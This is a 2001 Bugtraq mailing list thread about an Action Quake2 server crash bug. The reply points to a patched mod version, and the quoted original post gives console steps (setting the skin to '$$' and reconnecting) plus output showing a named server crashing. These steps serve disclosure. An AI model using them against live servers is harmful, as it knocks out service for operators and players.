Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Bug in Action Quake2 v1.52+vote

From: Daniel Chin <dschin () SYR EDU>
Date: Wed, 14 Feb 2001 17:41:47 -0500
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

this bug is known about. unfortunately, the official AQ2 is no longer
under development, so it probably won't get patched officially.
(http://www.telefragged.net/action)

however, many US servers are running AQ:E/TE 4.3d, which fixes the $$
skin bug, and many others (such as weapon farming). for more
information, check out aqdt.fear.net (this is the version that the
OGL requires servers to run for AQ matches, so its not as if its a
very obscure sub-mod. :)) Consider trying to convince vulnerable
server operators to upgrade to this version.

below is a snippet of the AQ:E/TE changelog

- - Dan Chin
(or, in Action, [ST7]Lt.Hawkins ;)



AQDT Modified Action Quake - AQ: Espionage

::snip::
v4.3a

* Made $$ handling kindler and gentler

v4.3

 * Made several cvars _not_ serverinfo (to fix "info string length
exceeded")
 * Fixed $$ skin bug
::snip::




-----Original Message-----
From: Bugtraq List [mailto:BUGTRAQ () SECURITYFOCUS COM]On Behalf Of
Jordan T.
Sent: Wednesday, February 14, 2001 4:22 AM
To: BUGTRAQ () SECURITYFOCUS COM
Subject: [BUGTRAQ] Bug in Action Quake2 v1.52+vote


Bugtraq,

A friend of mine has discovered a possible bug in Action Quake2
teamplay v1.52+vote that allows any player to crash the server.
he can be reached at deathboy99 () hotmail com.
here are the details..

connect to the server, hit the console key " ` " and type this:
set skin "$$"  (with the double quotes)
goto multiplayer options, player options, and select allow
downloading and make
sure you allow skin downloading
then reconnect to the server and the following should happen:

]set skin "$$"
]connect 203.166.224.43:27910
Connecting to 203.166.224.43:27910...
203.166.224.43:27910: challenge
203.166.224.43:27910: client_connect

The Crack Down
Refusing to download a path with ..
Refusing to download a path with ..
Downloading players/$$/tris.md2
Server fatal crashed: FS_Read: 0 bytes read

I have confirmed this.



-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>

iQA/AwUBOosJoFQE03pSB7UuEQI+3QCgttzie5IcMIYeZuGf7B942/lgRpgAn1Jp
9zx0FnuNb+h82qJlQhE86gBe
=fbuZ
-----END PGP SIGNATURE-----
Previous By Date Next
Previous By Thread Next

Current thread: